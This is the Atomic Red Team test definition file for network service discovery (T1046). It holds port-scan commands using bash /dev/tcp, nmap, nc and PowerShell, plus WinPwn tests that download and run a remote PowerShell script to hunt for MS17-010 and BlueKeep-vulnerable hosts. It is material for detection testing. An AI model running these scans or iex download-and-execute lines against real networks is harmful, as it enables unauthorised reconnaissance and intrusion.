security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1046/T1046.yaml
T
Atomic Red Team doc generator 1d16e91c58 Generated docs from job=generate-docs branch=master [ci skip]
2025-03-10 21:59:13 +00:00

308 lines
13 KiB
YAML
Raw Permalink Blame History

attack_technique: T1046
display_name: Network Service Discovery
atomic_tests:
- name: Port Scan
auto_generated_guid: 68e907da-2539-48f6-9fc9-257a78c05540
description: |
Scan ports to check for listening ports.
Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
supported_platforms:
- linux
- macos
input_arguments:
host:
description: Host to scan.
type: string
default: 192.168.1.1
executor:
command: |
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
name: bash
- name: Port Scan Nmap
auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f
description: |
Scan ports to check for listening ports with Nmap.
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
supported_platforms:
- linux
- macos
input_arguments:
host:
description: Host to scan.
type: string
default: 192.168.1.1
port:
description: Ports to scan.
type: string
default: "80"
network_range:
description: Network Range to Scan.
type: string
default: 192.168.1.0/24
dependency_executor_name: sh
dependencies:
- description: |
Check if nmap command exists on the machine
prereq_command: |
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which pkg && pkg install -y nmap)
- description: |
Check if nc command exists on the machine
prereq_command: |
if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
(which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)||(which pkg && pkg install -y netcat)
- description: |
Check if telnet command exists on the machine
prereq_command: |
if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
(which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)
executor:
command: |
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
name: sh
elevation_required: true
- name: Port Scan NMap for Windows
auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
description: Scan ports to check for listening ports for the local host 127.0.0.1
supported_platforms:
- windows
input_arguments:
nmap_url:
description: NMap installer download URL
type: url
default: https://nmap.org/dist/nmap-7.80-setup.exe
host_to_scan:
description: The host to scan with NMap
type: string
default: 127.0.0.1
dependency_executor_name: powershell
dependencies:
- description: |
NMap must be installed
prereq_command: 'if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}'
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe" #{nmap_url}
Start-Process "PathToAtomicsFolder\..\ExternalPayloads\nmap-7.80-setup.exe" /S
executor:
command: |-
nmap #{host_to_scan}
name: powershell
elevation_required: true
- name: Port Scan using python
auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c
description: |
Scan ports to check for listening ports with python
supported_platforms:
- windows
input_arguments:
host_ip:
description: Host to scan.
type: string
default: 127.0.0.1
filename:
description: Location of the project file
type: path
default: PathToAtomicsFolder\T1046\src\T1046.py
dependency_executor_name: powershell
dependencies:
- description: |
Check if python exists on the machine
prereq_command: |
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
get_prereq_command: |
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
executor:
command: |
python "#{filename}" -i #{host_ip}
name: powershell
- name: WinPwn - spoolvulnscan
auto_generated_guid: 54574908-f1de-4356-9021-8053dd57439a
description: Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
name: powershell
- name: WinPwn - MS17-10
auto_generated_guid: 97585b04-5be2-40e9-8c31-82157b8af2d6
description: Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
name: powershell
- name: WinPwn - bluekeep
auto_generated_guid: 1cca5640-32a9-46e6-b8e0-fabbe2384a73
description: Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
name: powershell
- name: WinPwn - fruit
auto_generated_guid: bb037826-cbe8-4a41-93ea-b94059d6bb98
description: Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
supported_platforms:
- windows
executor:
command: |-
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
name: powershell
- name: Network Service Discovery for Containers
auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
description: Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
supported_platforms:
- containers
dependency_executor_name: sh
dependencies:
- description: Verify docker is installed.
prereq_command: |
which docker
get_prereq_command: |
if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
- description: Verify docker service is running.
prereq_command: |
sudo systemctl status docker --no-pager
get_prereq_command: |
sudo systemctl start docker
executor:
command: |-
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
cleanup_command: |-
docker stop t1046_container
docker rmi -f t1046
name: sh
- name: Port-Scanning /24 Subnet with PowerShell
auto_generated_guid: 05df2a79-dba6-4088-a804-9ca0802ca8e4
description: |
Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask.
The connection attempts to use a timeout parameter in milliseconds to speed up the scan. Please note the atomic might not print any output until the scans are completed.
supported_platforms:
- windows
input_arguments:
ip_address:
description: IP-Address within the target subnet. Default is empty and script tries to determine local IP address of attacking machine. A comma separated list of targe IPs is also accepted (useful to simulate a wider scan while only scanning key host e.g., honeypots)
type: string
default: ""
port_list:
description: Comma separated list of ports to scan
type: string
default: "445, 3389"
timeout_ms:
description: Connection timeout in milliseconds
type: string
default: "200"
executor:
command: |-
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
name: powershell
- name: Remote Desktop Services Discovery via PowerShell
auto_generated_guid: 9e55750e-4cbf-4013-9627-e9a045b541bf
description: |
Availability of remote desktop services can be checked using get- cmdlet of PowerShell
supported_platforms:
- windows
executor:
command: |
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
name: powershell
elevation_required: true
- name: Port Scan using nmap (Port range)
auto_generated_guid: 0d5a2b03-3a26-45e4-96ae-89485b4d1f97
description: |
Scan multiple ports to check for listening ports with nmap
supported_platforms:
- linux
- macos
input_arguments:
host:
description: Host(s) to scan.
type: string
default: "127.0.0.1"
port_range:
description: Port range(s) to scan.
type: string
default: "0-65535"
dependency_executor_name: sh
dependencies:
- description: |
Check if nmap command exists on the machine
prereq_command: |
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
get_prereq_command: |
(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which pkg && pkg install -y nmap)||(which brew && brew install nmap)
executor:
command: |
nmap -Pn -sV -p #{port_range} #{host}
elevation_required: true
name: sh
Reference in New Issue View Git Blame Copy Permalink